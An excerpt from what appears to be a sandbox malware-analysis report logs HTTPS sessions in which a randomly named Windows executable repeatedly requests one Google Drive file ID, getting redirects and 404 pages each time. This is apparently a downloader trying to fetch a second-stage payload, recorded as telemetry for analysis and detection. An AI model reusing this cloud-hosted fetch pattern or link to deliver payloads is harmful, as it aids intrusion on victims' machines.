                                                        29192.168.11.2049780142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:38 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:38 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:38 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-F58rQQX3wQf1Sb5v-CAd6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4JnoAhu0c9FvuTKN8n48KKwWEE0s7jCWS2h8TNfETV2BpQF2jSmwbKWCJ0yKmDundOBN_33ttGaA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 39 70 67 52 48 34 51 30 78 59 75 30 53 79 6f 45 74 37 6a 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U9pgRH4Q0xYu0SyoEt7jfQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.11.2049781142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:49 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:49 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:49 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ku--l54Nlg4jf_T1SOOI_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.11.2049782142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:05:49 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:05:50 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:05:50 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-bqye9HMrsU07fFaF5gJCsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC43XaxlFqyVA6M2XyBvZI-18sVr_4K1WPuRpYXcq1cXD0RwaWHXuAYjpcX2gJDjHaAlK1l-bT25HA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:05:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 2d 6b 62 49 62 6c 55 62 4a 64 4a 52 63 34 48 4f 45 76 79 75 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9-kbIblUbJdJRc4HOEvyuA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.11.2049783142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:00 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:00 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:00 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-P05a5V4imh20DSs_LXNUXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.11.2049784142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:00 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:01 UTC1854INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:01 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-i-HzHjzfENGb9z2j9QZMjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC61E3qxaDeVNEsvXIHsiQHj78gIg4qxQweaHiarS-ubhhtCQEztpuSFvLjHQ_zrlX-yfpyB81GxRA
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:01 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 69 6b 63 32 42 67 69 49 79 67 79 71 5f 51 53 6e 64 6f 57 2d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Aikc2BgiIygyq_QSndoW-g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.11.2049785142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:11 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:11 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:11 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-DSvISPtS6latOKg2ancO0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.11.2049786142.250.64.1934435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:12 UTC460OUTGET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:12 UTC1847INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:12 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-T30503VURgHNMWOuDA9ZmQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        X-GUploader-UploadID: AFiumC4XmtXROYDrJAf5wxMMa53vWiWT9Fc0J9pfjHiSgmtxM8-oGbAnr9zHDWE238S6tlEP-0k
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-05 16:06:12 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 5a 53 68 64 68 6e 45 37 67 65 5a 47 49 33 72 41 76 76 64 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NZShdhnE7geZGI3rAvvdHg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.11.2049787142.250.217.2384435216C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-05 16:06:22 UTC418OUTGET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
                                                        2024-12-05 16:06:23 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Thu, 05 Dec 2024 16:06:22 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
